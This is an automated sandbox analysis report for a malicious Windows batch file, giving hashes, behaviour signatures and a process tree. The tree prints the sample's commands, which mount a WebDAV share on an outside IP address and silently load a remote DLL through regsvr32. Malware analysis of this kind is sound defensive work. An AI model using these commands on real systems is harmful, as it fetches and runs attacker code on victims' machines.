e994149c55ff93a1796d5ebd5df79b9a65b061b60e45dcfb248096484d291f47 | Triage

Analysis

max time kernel
122s
max time network
125s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
09-07-2024 08:52

Sharing

Report Analysis Logs

General

Target

3665205611007218718.bat
Size

5KB
MD5

948587934cf8b770110459b75f535c92
SHA1

9c4aea7a9ed189b94bfbdd602b36f053c7de84a8
SHA256

19af72bff8899de0ee90dcd39f79d2b78fb482f46b6b70e5d57fb0cc93dbbe53
SHA512

298390ecc2407c2c519cb0680ee8db264be072b7335968fa121b1c7f19739e01ed42a8ab3c88612e0789a4f0143713fbf125e9eb855067f64608592fadb3ef5e
SSDEEP

96:rNh30k+GrqLOjJYqih10GhhLDno0GhhLj04RqFq0:JZqKtYqivxhhoxhh3VqFq0

Score

1^/10

Malware Config

Signatures

Runs net.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2788	regsvr32.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2244 wrote to memory of 2728	2244	cmd.exe	31
PID 2244 wrote to memory of 2728	2244	cmd.exe	31
PID 2244 wrote to memory of 2728	2244	cmd.exe	31
PID 2244 wrote to memory of 2788	2244	cmd.exe	32
PID 2244 wrote to memory of 2788	2244	cmd.exe	32
PID 2244 wrote to memory of 2788	2244	cmd.exe	32
PID 2244 wrote to memory of 2788	2244	cmd.exe	32
PID 2244 wrote to memory of 2788	2244	cmd.exe	32

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\3665205611007218718.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2244
- C:\Windows\system32\net.exe
  net use \\45.9.74.13@8888\DavWWWRoot\
  2⤵
  PID:2728
- C:\Windows\system32\regsvr32.exe
  regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\138.dll
  2⤵
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  PID:2788

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads